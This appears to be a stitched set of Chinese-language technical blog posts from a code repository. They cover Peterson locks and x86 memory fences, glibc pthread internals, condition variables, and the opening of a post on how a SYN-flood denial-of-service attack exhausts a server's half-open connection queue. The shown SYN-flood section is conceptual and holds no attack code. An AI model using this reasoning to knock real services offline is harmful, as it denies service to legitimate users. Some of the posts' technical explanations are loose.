fences on an x86?](https://bartoszmilewski.com/2008/11/05/who-ordered-memory-fences-on-an-x86/) 99 | - 这里有更详细的关于Intel IA64 Memory Ordering的资料 -> [Intel® 64 Architecture Memory Ordering White Paper](http://www.cs.cmu.edu/~410-f10/doc/Intel_Reordering_318147.pdf) 100 | - C++ 里Memory Order相关的资料(由于atomic本身就用到了原子操作,所以我并不打算使用) -> [std::memory_order](http://en.cppreference.com/w/cpp/atomic/memory_order) 101 | 102 |   请你务必仔细看完以上的三份资料,不然无法继续进行接下来的内容。 103 |   以上Peterson Lock实现失败的原因就显而易见了,博主的机器是Intel x86-64 smp的机器,拥有strict memory order,也就是只有在store&load的 104 | 情况下才会有指令重拍的问题,而以上Peterson Lock的实现正好就是store&load的情况,为此我们必须避免CPU的指令重排。 105 | 106 | ### 关于Memory Fence 107 |   上节提到避免指令重排需要加Memory Fence,指令重排分为两种: 108 | - 一种是编译时期的指令重排,可以通过这个来防止:`asm volatile ("" : : : "memory")` 109 | - 一种是运行时期的cpu指令重排,同时也包含了防止编译时期的指令重排:`asm volatile ("mfence" : : : "memory")` or `asm volatile ("lfence" : : : "memory")` or `asm volatile ("sfence" : : : "memory")` 110 | 111 |   而Memory Fence分为三种: 112 | - mfence -> Performs a serializing operation on all load-from-memory and store-to-memory instructions that were issued prior the MFENCE instruction. **This serializing operation guarantees that every load and store instruction that precedes in program order the MFENCE instruction is globally visible before any load or store instruction that follows the MFENCE instruction is globally visible.** The MFENCE instruction is ordered with respect to all load and store instructions, other MFENCE instructions, any SFENCE and LFENCE instructions, and any serializing instructions (such as the CPUID instruction). 113 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue, speculative reads, write-combining, and write-collapsing. 114 | The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. 
The MFENCE instruction provides a performance-efficient way of ensuring load and store ordering between routines that produce weakly-ordered results and routines that consume that data. 115 | It should be noted that processors are free to speculatively fetch and cache data from system memory regions that are assigned a memory-type that permits speculative reads (that is, the WB, WC, and WT memory types). The PREFETCHh instruction is considered a hint to this speculative behavior. Because this speculative fetching can occur at any time and is not tied to instruction execution, the MFENCE instruction is not ordered with respect to PREFETCHh instructions or any other speculative fetching mechanism (that is, data could be speculatively loaded into the cache just before, during, or after the execution of an MFENCE instruction). 116 | - lfence -> Performs a serializing operation on all load-from-memory instructions that were issued prior the LFENCE instruction. This serializing operation guarantees that every load instruction that precedes in program order the LFENCE instruction is globally visible before any load instruction that follows the LFENCE instruction is globally visible. The LFENCE instruction is ordered with respect to load instructions, other LFENCE instructions, any MFENCE instructions, and any serializing instructions (such as the CPUID instruction). It is not ordered with respect to store instructions or the SFENCE instruction. 117 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue and speculative reads. The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. The LFENCE instruction provides a performance-efficient way of insuring load ordering between routines that produce weakly-ordered results and routines that consume that data. 
118 | It should be noted that processors are free to speculatively fetch and cache data from system memory regions that are assigned a memory-type that permits speculative reads (that is, the WB, WC, and WT memory types). The PREFETCHh instruction is considered a hint to this speculative behavior. Because this speculative fetching can occur at any time and is not tied to instruction execution, the LFENCE instruction is not ordered with respect to PREFETCHh instructions or any other speculative fetching mechanism (that is, data could be speculative loaded into the cache just before, during, or after the execution of an LFENCE instruction). 119 | - sfence -> Performs a serializing operation on all store-to-memory instructions that were issued prior the SFENCE instruction. This serializing operation guarantees that every store instruction that precedes in program order the SFENCE instruction is globally visible before any store instruction that follows the SFENCE instruction is globally visible. The SFENCE instruction is ordered with respect store instructions, other SFENCE instructions, any MFENCE instructions, and any serializing instructions (such as the CPUID instruction). It is not ordered with respect to load instructions or the LFENCE instruction. 120 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue, write-combining, and write-collapsing. The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. The SFENCE instruction provides a performance-efficient way of insuring store ordering between routines that produce weakly-ordered results and routines that consume this data. 
121 | 122 |   参考Intel x86-64的Memory Ordering的设计,其实lfence和sfence在保证Memory Ordering这点上是没有意义的,因为Intel x86-64本来就是strict memory order,但是在内存可见性这个点上,lfence和sfence仍然有其价值。由于Peterson Lock是为了避免store&load的指令重排,所以我们使用mfence, 123 | 即Full Memory Fence。加上MFENCE之后的代码如下: 124 | ```c 125 | #ifndef _PETERSON_LOCK_H 126 | #define _PETERSON_LOCK_H 127 | /* 128 | * Description: implementing peterson's locking algorithm 129 | * File: peterson_lock.h 130 | * Author: Charles, Liu. 131 | * Mailto: charlesliu.cn.bj@gmail.com 132 | */ 133 | #include <stdbool.h> 134 | 135 | typedef struct { 136 | volatile bool flag[2]; 137 | volatile int victim; 138 | } peterson_lock_t; 139 | 140 | void peterson_lock_init(peterson_lock_t &lock) { 141 | lock.flag[0] = lock.flag[1] = false; 142 | lock.victim = 0; 143 | } 144 | 145 | void peterson_lock(peterson_lock_t &lock, int id) { 146 |   lock.flag[id] = true; // 子句A 147 |   lock.victim = id; // 子句B,子句A和B的顺序很重要,如果调换的话会出现问题 148 |   asm volatile ("mfence" : : : "memory"); // MFENCE加在store和load之间 149 |   while (lock.flag[1 - id] && lock.victim == id); 150 | } 151 | 152 | void peterson_unlock(peterson_lock_t &lock, int id) { 153 | lock.flag[id] = false; 154 | lock.victim = id; 155 | } 156 | 157 | #endif 158 | ``` 159 |   首先看一下MFENCE添加的位置是在store和load之间,其次思考这么一个问题,如果调换子句A和子句B的位置会出现什么情况呢?
160 | ```c 161 | peterson_lock_0: peterson_lock_1: 162 | ------------------------------------------------------- 163 | lock.victim = 0; 164 | lock.victim = 1; 165 | lock.flag[1] = true; 166 | asm volatile ("mfence" : : : "memory"); 167 | while (lock.flag[0] && lock.victim == 1); 168 | // lock.flag[0] is false so 169 | // the process enters critical 170 | // section 171 | lock.flag[0] = true; 172 | asm volatile ("mfence" : : : "memory"); 173 | while (lock.flag[1] && lock.victim == 0); 174 | // lock.victim is 1 so 175 | // the process enters critical 176 | // section 177 | ``` 178 |   Thread0和Thread1会同时进入Critical Section,再思考如下的情况, 179 | ```c 180 | Thread0: Thread1: 181 | ------------------------------------------------------- 182 | lock.flag[0] = true; 183 | lock.victim = 0; 184 | lock.flag[1] = true; 185 | lock.victim = 1; 186 | mfence; 187 | 如果这个时候Thread0的lock.victim = 0对于Thread1可见, 188 | 那么会进入Critical Section 189 | mfence; 190 | 如果这个时候Thread1的lock.victim = 1对于 191 | Thread0可见,那么会进入Critical Section 192 | ``` 193 |   以上情况并没有发生,为什么呢?请看mfence那段加粗的文字,这正是mfence的另一个作用,内存可见性。 194 | 195 | ### 关于volatile和GCC优化 196 |   如果去掉上面的两个volatile,不加优化,运行正常,`void peterson_lock(peterson_lock_t &lock, int id)`的汇编结果如下: 197 | ```asm 198 | 0000000000400638 <_Z13peterson_lockR15peterson_lock_ti>: 199 | 400638: 55 push rbp 200 | 400639: 48 89 e5 mov rbp,rsp 201 | 40063c: 48 89 7d f8 mov QWORD PTR [rbp-0x8],rdi 202 | 400640: 89 75 f4 mov DWORD PTR [rbp-0xc],esi 203 | 400643: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 204 | 400647: 8b 45 f4 mov eax,DWORD PTR [rbp-0xc] 205 | 40064a: 48 98 cdqe 206 | 40064c: c6 04 02 01 mov BYTE PTR [rdx+rax*1],0x1 ; Clause 1 207 | 400650: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] ; Clause 2 208 | 400654: 8b 55 f4 mov edx,DWORD PTR [rbp-0xc] ; Clause 3 209 | 400657: 89 50 04 mov DWORD PTR [rax+0x4],edx ; Clause 4 210 | 40065a: 0f ae f0 mfence 211 | 40065d: 90 nop 212 | 40065e: b8 01 00 00 00 mov eax,0x1 213 | 400663: 2b 45 f4 sub eax,DWORD PTR [rbp-0xc] 214 | 400666: 
48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 215 | 40066a: 48 98 cdqe 216 | 40066c: 0f b6 04 02 movzx eax,BYTE PTR [rdx+rax*1] 217 | 400670: 84 c0 test al,al 218 | 400672: 74 0c je 400680 <_Z13peterson_lockR15peterson_lock_ti+0x48> 219 | 400674: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] 220 | 400678: 8b 40 04 mov eax,DWORD PTR [rax+0x4] 221 | 40067b: 3b 45 f4 cmp eax,DWORD PTR [rbp-0xc] 222 | 40067e: 74 de je 40065e <_Z13peterson_lockR15peterson_lock_ti+0x26> 223 | 400680: 5d pop rbp 224 | 400681: c3 ret 225 | ``` 226 |   请看上述汇编中标注出来的Clause 1-4,正好对应下面的两句话: 227 | ```c 228 | lock.flag[id] = true; 229 | lock.victim = id; 230 | ``` 231 |   但是值并没有存在寄存器里面,也并没有直接从寄存器读取,而是直接读取内存。 232 |   233 |   如果我们加上`-O2`再编译一次,得到的`void peterson_lock(peterson_lock_t &lock, int id)`的汇编结果如下: 234 | ```asm 235 | 00000000004007a0 <_Z13peterson_lockR15peterson_lock_ti>: 236 | 4007a0: 48 63 c6 movsxd rax,esi 237 | 4007a3: c6 04 07 01 mov BYTE PTR [rdi+rax*1],0x1 ; Clause 1 238 | 4007a7: 89 77 04 mov DWORD PTR [rdi+0x4],esi ; Clause 2 239 | 4007aa: 0f ae f0 mfence 240 | 4007ad: b8 01 00 00 00 mov eax,0x1 241 | 4007b2: 29 f0 sub eax,esi 242 | 4007b4: 48 98 cdqe 243 | 4007b6: 80 3c 07 00 cmp BYTE PTR [rdi+rax*1],0x0 244 | 4007ba: 75 04 jne 4007c0 <_Z13peterson_lockR15peterson_lock_ti+0x20> 245 | 4007bc: f3 c3 repz ret 246 | 4007be: 66 90 xchg ax,ax 247 | 4007c0: 39 77 04 cmp DWORD PTR [rdi+0x4],esi 248 | 4007c3: 75 f7 jne 4007bc <_Z13peterson_lockR15peterson_lock_ti+0x1c> 249 | 4007c5: 39 77 04 cmp DWORD PTR [rdi+0x4],esi 250 | 4007c8: 74 f6 je 4007c0 <_Z13peterson_lockR15peterson_lock_ti+0x20> 251 | 4007ca: eb f0 jmp 4007bc <_Z13peterson_lockR15peterson_lock_ti+0x1c> 252 | 4007cc: 0f 1f 40 00 nop DWORD PTR [rax+0x0] 253 | ``` 254 |   请注意上面的Clause 1-2,发现没,`lock.flag[id]`变为了直接赋值,而`lock.victim`的值变为从`esi`寄存器读,由于现在CPU架构大多都是NUMA架构,我的也是,各个CPU独享自己的寄存器,然后`gdb -tui [our program]`,`break peterson_lock`然后运行发现,直接跳转如下: 255 | 256 |   
并没有`peterson_lock`函数,也就是`-O2`直接将它inline掉了。如果运行程序会发现程序直接死锁了,下面我会给出解释的,先让我们看看`-O3`编译出的版本: 257 | ```asm 258 | 00000000004007a0 <_Z13peterson_lockR15peterson_lock_ti>: 259 | 4007a0: 48 63 c6 movsxd rax,esi 260 | 4007a3: c6 04 07 01 mov BYTE PTR [rdi+rax*1],0x1 261 | 4007a7: 89 77 04 mov DWORD PTR [rdi+0x4],esi 262 | 4007aa: 0f ae f0 mfence 263 | 4007ad: b8 01 00 00 00 mov eax,0x1 264 | 4007b2: 29 f0 sub eax,esi 265 | 4007b4: 48 98 cdqe 266 | 4007b6: 80 3c 07 00 cmp BYTE PTR [rdi+rax*1],0x0 267 | 4007ba: 74 05 je 4007c1 <_Z13peterson_lockR15peterson_lock_ti+0x21> 268 | 4007bc: 3b 77 04 cmp esi,DWORD PTR [rdi+0x4] 269 | 4007bf: 74 07 je 4007c8 <_Z13peterson_lockR15peterson_lock_ti+0x28> 270 | 4007c1: f3 c3 repz ret 271 | 4007c3: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] 272 | 4007c8: eb fe jmp 4007c8 <_Z13peterson_lockR15peterson_lock_ti+0x28> 273 | 4007ca: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0] 274 | ``` 275 |   和`-O2`的版本并没有多大差别,如果运行的话还是会死锁。为什么会死锁呢?解释如下: 276 | ```c 277 | 由于lock.victim的值直接从寄存器读取,那么lock.victim == id 的条件恒成立 278 | 279 | Thread0                             Thread1 280 | ------------------------------------------------------------------ 281 | lock.flag[0] = true; lock.flag[1] = true; 282 | lock.victim = 0; lock.victim = 1; 283 | mfence; mfence; 284 | while (lock.flag[1] && lock.victim == 0);       while (lock.flag[0] && lock.victim == 1); 285 | 同时进入死锁 286 | ``` 287 |   其实由于Thread0写`lock.flag[0]`,读`lock.flag[1]`;Thread1写`lock.flag[1]`,读`lock.flag[0]`,即各自读写不同的内存,所以`bool lock.flag[2]`之前的`volatile`是可以去掉的,但是`volatile int lock.victim`前面的`volatile`是必须得保留的。 288 |   总结一下,`volatile`修饰的作用就是避免在Hardware层面上,变量的值会被写进寄存器,这样也就不会从寄存器读取了。 289 | 290 | ### 本报告的简略PDF 291 |   [Peterson Locking Algorithm Report](https://github.com/linghuazaii/parallel_programming/blob/master/petersons/peterson_report.pdf) 292 | 293 | ### 小结 294 |   满满的干货,Good Luck, Have Fun!!! 
295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | -------------------------------------------------------------------------------- /parallel-programming-pthreads1.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]深入PThread (Lesson I) 2 | ============================================ 3 | 4 | ### 前言 5 |   因为最近一直在研究Parallel Programming方面的东西,Lock的实现,一些Design Patterns以及atomic,fence,lock-free之类的东西。我学东西都是比较分散的,不是一个东西一本书或者一份资料啃到底。今天刚好到PThreads,将一些东西记录如下。 6 | 7 | ### Hyper Thread 8 |    9 |   在你的印象中,内存是不是这样的?古老的UMA(Uniform Memory Access),多个CPU共享一整个RAM。 10 |    11 |   现在的Linux Server,基本都是这样的,是不是感觉世界瞬间不一样了?即所说的NUMA(Non-Uniform Memory Access)。 12 |    13 |   单个CPU是这样的,内存访问也并不是你印象中的直接由RAM拿到,而是由RAM=>CPU Cache=>CPU。在公司的Server上`lscpu`结果如下:   14 | ``` 15 | Architecture:         x86_64 16 | CPU op-mode(s): 32-bit, 64-bit 17 | Byte Order: Little Endian 18 | CPU(s): 4 19 | On-line CPU(s) list: 0-3 20 | Thread(s) per core: 2 21 | Core(s) per socket: 2 22 | Socket(s): 1 23 | NUMA node(s): 1 24 | Vendor ID: GenuineIntel 25 | CPU family: 6 26 | Model: 63 27 | Model name: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz 28 | Stepping: 2 29 | CPU MHz: 2400.058 30 | BogoMIPS: 4800.11 31 | Hypervisor vendor: Xen 32 | Virtualization type: full 33 | L1d cache: 32K 34 | L1i cache: 32K 35 | L2 cache: 256K 36 | L3 cache: 30720K 37 | NUMA node0 CPU(s): 0-3 38 | ``` 39 | 单个CPU有三级缓存,访问的clock cycle递增,L1 Cache最快。x86用的CISC指令集,CISC指令集比RISC复杂,Decode的Cost要更高,所以有两个L1 Cache,即L1i(instruction)Cache,用来缓存Decode的CPU指令;L1d(Data)Cache,用来缓存内存数据。   40 |    41 |   多个CPU是这样的,图中给出了两个物理CPU,每个物理CPU有两个Core,每个Core有两个thread,两个thread共享L1i和L1d,Intel的thread实现是这样的,它们有各自独有的寄存器,但是有些寄存器还是共享的,以上就是Intel的Hyper Thread设计。当然,只是一个例子,不同的CPU可能用的不同的架构。你可能会问,这些和Pthread有关吗?关系不大,但是了解了这些便于你更好的理解Memory Model和内存可见性方面的问题。 42 | 43 | ### pthread_create 44 |   我们调用`pthread_create(&tid, NULL, start_routine, 
args)`会经历哪些步骤呢?将attribute置为NULL是为了简化问题,下文我们会提到的。 45 | ```c 46 | int __pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr, 47 | void *(*start_routine) (void *), void *arg) 48 | { 49 | const struct pthread_attr *iattr = (struct pthread_attr *) attr; 50 | struct pthread_attr default_attr; 51 | if (iattr == NULL) 52 | { 53 | lll_lock (__default_pthread_attr_lock, LLL_PRIVATE); 54 | default_attr = __default_pthread_attr; 55 | lll_unlock (__default_pthread_attr_lock, LLL_PRIVATE); 56 | iattr = &default_attr; 57 | } 58 | 59 | struct pthread *pd = NULL; 60 | int err = ALLOCATE_STACK (iattr, &pd); 61 | pd->start_routine = start_routine; 62 | pd->arg = arg; 63 | atomic_increment (&__nptl_nthreads); 64 | bool thread_ran = false; 65 | retval = create_thread (pd, iattr, true, STACK_VARIABLES_ARGS, 66 | } 67 | ``` 68 |   函数精简后大致是这样的,但是我没有找到`__default_pthread_attr`设置`cpuset`的地方,`pthread_create`会接着调用`create_thread`。 69 | ```c 70 | static int create_thread (struct pthread *pd, const struct pthread_attr *attr, 71 | bool stopped_start, STACK_VARIABLES_PARMS, bool *thread_ran) 72 | { 73 | /* We rely heavily on various flags the CLONE function understands: 74 | CLONE_VM, CLONE_FS, CLONE_FILES 75 | These flags select semantics with shared address space and 76 | file descriptors according to what POSIX requires. 77 | CLONE_SIGHAND, CLONE_THREAD 78 | This flag selects the POSIX signal semantics and various 79 | other kinds of sharing (itimers, POSIX timers, etc.). 80 | CLONE_SETTLS 81 | The sixth parameter to CLONE determines the TLS area for the 82 | new thread. 83 | CLONE_PARENT_SETTID 84 | The kernels writes the thread ID of the newly created thread 85 | into the location pointed to by the fifth parameters to CLONE. 86 | Note that it would be semantically equivalent to use 87 | CLONE_CHILD_SETTID but it is be more expensive in the kernel. 
88 | CLONE_CHILD_CLEARTID 89 | The kernels clears the thread ID of a thread that has called 90 | sys_exit() in the location pointed to by the seventh parameter 91 | to CLONE. 92 | The termination signal is chosen to be zero which means no signal 93 | is sent. */ 94 | const int clone_flags = (CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM 95 | | CLONE_SIGHAND | CLONE_THREAD 96 | | CLONE_SETTLS | CLONE_PARENT_SETTID 97 | | CLONE_CHILD_CLEARTID 98 | | 0); 99 | ARCH_CLONE (&start_thread, STACK_VARIABLES_ARGS, 100 | clone_flags, pd, &pd->tid, tp, &pd->tid); 101 | *thread_ran = true; 102 | if (attr != NULL) 103 | { 104 | INTERNAL_SYSCALL_DECL (err); 105 | if (attr->cpuset != NULL) 106 | { 107 | res = INTERNAL_SYSCALL (sched_setaffinity, err, 3, pd->tid, 108 | attr->cpusetsize, attr->cpuset); 109 | } 110 | if ((attr->flags & ATTR_FLAG_NOTINHERITSCHED) != 0) 111 | { 112 | res = INTERNAL_SYSCALL (sched_setscheduler, err, 3, pd->tid, 113 | pd->schedpolicy, &pd->schedparam); 114 | } 115 | } 116 | return 0; 117 | } 118 | ``` 119 |   这里需要注意的是上面的一堆`flags`和它们的说明,可以发现,对于所有\*nix系统来说,线程就是轻量级的进程,线程无非就是共享了除栈外几乎所有进程所有的资源,所以线程的切换消耗无非就是保存寄存器的值和线程自己的栈数据。下次如果有人问你线程和进程的区别,一定要回答的深入一点,这样就可以吊打面试官啦! 120 | ```c 121 | #define ARCH_FORK() \ 122 | INLINE_SYSCALL (clone2, 6, \ 123 | CLONE_CHILD_SETTID | CLONE_CHILD_CLEARTID | SIGCHLD, \ 124 | NULL, 0, NULL, &THREAD_SELF->tid, NULL) 125 | #define ARCH_CLONE __clone2 126 | ``` 127 | ```asm 128 | /* int __clone2(int (*fn) (void *arg), void *child_stack_base, */ 129 | /* size_t child_stack_size, int flags, void *arg, */ 130 | /* pid_t *parent_tid, void *tls, pid_t *child_tid) */ 131 | 132 | #define CHILD p8 133 | #define PARENT p9 134 | 135 | ENTRY(__clone2) 136 | .prologue 137 | alloc r2=ar.pfs,8,1,6,0 138 | cmp.eq p6,p0=0,in0 139 | cmp.eq p7,p0=0,in1 140 | mov r8=EINVAL 141 | mov out0=in3 /* Flags are first syscall argument. */ 142 | mov out1=in1 /* Stack address. 
*/ 143 | (p6) br.cond.spnt.many __syscall_error /* no NULL function pointers */ 144 | (p7) br.cond.spnt.many __syscall_error /* no NULL stack pointers */ 145 | ;; 146 | mov out2=in2 /* Stack size. */ 147 | mov out3=in5 /* Parent TID Pointer */ 148 | mov out4=in7 /* Child TID Pointer */ 149 | mov out5=in6 /* TLS pointer */ 150 | /* 151 | * clone2() is special: the child cannot execute br.ret right 152 | * after the system call returns, because it starts out 153 | * executing on an empty stack. Because of this, we can't use 154 | * the new (lightweight) syscall convention here. Instead, we 155 | * just fall back on always using "break". 156 | * 157 | * Furthermore, since the child starts with an empty stack, we 158 | * need to avoid unwinding past invalid memory. To that end, 159 | * we'll pretend now that __clone2() is the end of the 160 | * call-chain. This is wrong for the parent, but only until 161 | * it returns from clone2() but it's better than the 162 | * alternative. 163 | */ 164 | mov r15=SYS_ify (clone2) 165 | .save rp, r0 166 | break __BREAK_SYSCALL 167 | .body 168 | cmp.eq p6,p0=-1,r10 169 | cmp.eq CHILD,PARENT=0,r8 /* Are we the child? */ 170 | (p6) br.cond.spnt.many __syscall_error 171 | ;; 172 | (CHILD) mov loc0=gp 173 | (PARENT) ret 174 | ;; 175 | tbit.nz p6,p0=in3,8 /* CLONE_VM */ 176 | (p6) br.cond.dptk 1f 177 | ;; 178 | mov r15=SYS_ify (getpid) 179 | (p7) break __BREAK_SYSCALL 180 | ;; 181 | add r9=PID,r13 182 | add r10=TID,r13 183 | ;; 184 | st4 [r9]=r8 185 | st4 [r10]=r8 186 | ;; 187 | 1: ld8 out1=[in0],8 /* Retrieve code pointer. */ 188 | mov out0=in4 /* Pass proper argument to fn */ 189 | ;; 190 | ld8 gp=[in0] /* Load function gp. */ 191 | mov b6=out1 192 | br.call.dptk.many rp=b6 /* Call fn(arg) in the child */ 193 | ;; 194 | mov out0=r8 /* Argument to _exit */ 195 | mov gp=loc0 196 | .globl HIDDEN_JUMPTARGET(_exit) 197 | br.call.dpnt.many rp=HIDDEN_JUMPTARGET(_exit) 198 | /* call _exit with result from fn. */ 199 | ret /* Not reached. 
*/ 200 | PSEUDO_END(__clone2) 201 | ``` 202 |   虽然我看不懂C里面的asm但是它调用了Linux的`clone2`,但是我没找到`clone2`的源码,反正肯定会调用`sys_clone`。`sys_clone`会创建一个新的进程,与`fork`不同的是,`sys_clone`容许新的进程共享父进程的内存,各种不同的段以及其他的东西,得到的pid就是新建的线程的thread id。继续回到之前,线程创建之后会根据`thread_attr`接着调用`sched_setaffinity`。`sched_setaffinity`的作用就是将CPU Core和Thread绑定,让thread只在指定的CPU上执行,这样做可以提升Performance。上文提到过,不同的CPU Core是不共享L1i和L1d的,这样线程去另一个CPU Core执行的话,会导致Cache Invalidation,这样就会导致内存读取,还是一个很大的损耗的,所以对于CPU Bound的程序来说,设置CPU affinity可以提升Performance。接着会调用`sched_setscheduler`,设置线程调度的优先级和调度策略。 203 | 204 | ### 结语 205 |   本课内容看似简短,其实扩展开来都是很复杂很深的课题。扩展的活儿就交给你自己啦,任何问题都可以撩博主,与博主交流!**Good Luck!Have Fun!** 206 | -------------------------------------------------------------------------------- /parallel-programming-pthreads2.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]深入PThread (Lesson II) 2 | ============================================= 3 | 4 | ### 回顾 5 |   上一节课我们讲了`pthread_create()`,这节课讲`mutex`和`condition variable`,东西有点多,我还以为我讲过`mutex`了,我有讲过吗? 
6 | 7 | ### 前言 8 |   `Pthreads`所有的东西的实现都是基于`Futex`,但是不打算讲`Futex`,我没看,感兴趣可以去这挖一挖。 9 |   [Futex Wiki](https://en.wikipedia.org/wiki/Futex) 10 | 11 | ### pthread_mutex_lock & pthread_mutex_unlock 12 |   其实Linux内核包括`Futex`,所有锁的实现都是spinlock,即test&set。关于test&set可以参考[Wiki](https://en.wikipedia.org/wiki/Test-and-set)。锁的本质其实就是原子操作,而原子操作需要hardware级别的支持,好在`xchg`系列交换值的指令是存在的,而且是原子性的,上层的调用类似`atomic_compare_and_exchange_val_acq`到汇编这一层就是这些原子指令。关于CAS(compare-and-swap)锁的例子,我自己写了一个,[看这里](https://github.com/linghuazaii/parallel_programming/tree/master/test_and_set_lock)。那么我们`pthread_mutex_lock`和`pthread_mutex_unlock`我们就讲完啦。我们不讲Futex,所以也不讲`pthread_mutex_t`之类的结构,只谈本质的话,锁就是这么简单。 13 | 14 | ### pthread_cond_wait 15 |   同样也不讲`pthread_cond_t`之类的结构,理由同上,但是还是有些细节要讲一讲。 16 | ```c 17 | __pthread_cond_wait (pthread_cond_t *cond, pthread_mutex_t *mutex) 18 | { 19 | err = __pthread_mutex_unlock_usercnt (mutex, 0); 20 | cond->__data.__nwaiters += 1 << COND_NWAITERS_SHIFT; 21 | do { 22 | lll_futex_wait (&cond->__data.__futex, futex_val, pshared); 23 | } while (val == seq || cond->__data.__woken_seq == val); 24 | ++cond->__data.__woken_seq; 25 | return __pthread_mutex_cond_lock (mutex); 26 | } 27 | ``` 28 |   代码简化完后大致干了这几件事,先解锁`mutex`,不然发送signal的线程没法获得这把锁,然后调用`lll_futex_wait`一直等待自己被唤醒,完了将`mutex`锁住。有人或许要问:为什么`condition variable`需要配一把锁呢?简而言之,设计使然,而且这个设计也是一石二鸟啊。首先等待的`condition`肯定是共享的资源,而且条件变量自身也是共享的资源,一把锁解决了两个共享资源的问题,棒不棒?!如果没有锁会怎么样?看看常见的条件变量用法: 29 | ```c 30 | Thread 1                                     Thread2 31 | ----------------------------- ------------------------------------- 32 | //pthread_mutex_lock(&mutex); //pthread_mutex_lock(&mutex); 33 | while(wait condition become true) change conditon to true; 34 | pthread_cond_wait(&cond, &mutex); pthread_cond_signal(&cond); 35 | do things; //pthread_mutex_unlock(&mutex); 36 | //pthread_mutex_unlock(&mutex); 37 | ``` 38 |   我们把锁注掉看会发生什么,假设`Thread1`运行在`CPU0`,`Thread2`运行在`CPU1`,首先考虑一下指令重排的情况:如果`condition = 
true`和`pthread_cond_signal`重排了,信号发了,在`pthread_cond_wait`之前,那么这个信号丢失了,`Thread1`永远Block在`pthread_cond_wait`。再考虑指令不重排的情况:由于是不同的CPU,所以彼此的cacheline并不一定可见,所以`thread2`运行`condition = true`然后发送`pthread_cond_signal`,对于`thread1`,`condition = true`暂时不可见,就会进入`while`,信号丢失,`pthread_cond_wait`永远Block。所以呢,加这把锁就很好的防止了信号丢失的问题。聪明的你可能会继续问:那为什么要`while`循环呢?这是为了保证系统的健壮性,对于内核来说,并不是什么都是确定的,可能由于某种意外情况,就好比意外怀孕一样,这个信号在条件不满足的时候也发出去了呢?这种Wakeup并不违反标准,所以Pthreads这么设计也是为了迎合标准,感兴趣可以Google下**Spurious Wake Up**。 39 | 40 | ### pthread_cond_signal & pthread_cond_broadcast 41 |   线程唤醒的原则遵循scheduler的标准,即wakeup的时候,谁的priority大,就唤醒谁,像`SCHED_OTHER`这种默认的`min/max priority`都为`0`的时间片抢占的情况来说,first-in-first-out,很公平。如果你要设计`priority`的话,类似于所有的实时程序设计,使用`SCHED_RR`或者`SCHED_FIFO`。   42 |   `pthread_cond_signal`简化一下就一行代码`lll_futex_wake (&cond->__data.__futex, 1, pshared)`;`pthread_cond_broadcast`简化一下也是一行代码`lll_futex_wake (&cond->__data.__futex, INT_MAX, pshared)`。简而言之,`pthread_cond_signal`只唤醒一个线程,根据scheduler策略来,`pthread_cond_broadcast`唤醒所有。 43 | 44 | ### 小结 45 |   本课内容好像并不多也,**Good Luck! Have Fun!** 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /syn-flood.md: -------------------------------------------------------------------------------- 1 | SYN-Flood简易实现和原理解析 2 | =========================== 3 | 4 | ## Prepare Reading 5 | ### Relevant Reading 6 | - IP RFC: [https://tools.ietf.org/html/rfc791](https://tools.ietf.org/html/rfc791) 7 | - TCP RFC: [https://tools.ietf.org/html/rfc793](https://tools.ietf.org/html/rfc793) 8 | - TCP state machine: [http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm](http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm) 9 | 10 | ### Why am I doing this? 
11 | 12 |   最近在重读UNP(Unix Network Programming),发现以前不懂的太多,只能一味地接受书上所述,未能提出过疑问,甚至有些东西都看不大懂。重读之后,发现忽略掉的细节有点太多,最先发现的就是`listen(sockfd, backlog)`里的`backlog`参数:它限制的是一个由`kernel`维护的、容量有限而且很小的连接队列,很容易就被耗尽,这就给了不怀好意的人可乘之机,即所谓的`SYN FLOOD`。正文就是浅说`SYN FLOOD`的简易实现和原理解析。
13 | 14 | ## SYN FLOOD原理解析 15 |   `SYN FLOOD`就是通过半连接耗尽目标主机、目标端口上的`kernel`资源,导致目标主机拒绝发往该端口的所有合法请求,即所谓的`Denial Of Service`(DOS攻击);如果通过一个集群攻击同一个目标主机,就是`Distributed Denial Of Service`(DDOS攻击)。
16 |   这里就不提老生常谈的`TCP`三次握手,四次握手,以及`TCP`状态转换图了,这块知识生疏了可以去翻翻`Prepare Reading`里的内容。 17 |   当`client`发送完一个`SYN`请求,`server`会回一个`SYN/ACK`,然后等待下一个`ACK`,那么此次连接就算成功建立了。那么,如果我们不给`server`回这个`ACK`呢,那么`server`的TCP状态会一直维持在`SYN_RCVD`状态,并触发超时重传,一定次数后回到`CLOSED`状态,但是每个`socket`的半连接资源是有限的,这样就会耗尽某个服务的半连接资源,导致拒绝服务攻击。
20 |   非常抱歉,我忘记截`TCP`包的图了,大伙儿自己用`wireshark`或者`tcpdump`抓一个看看就知道啦。
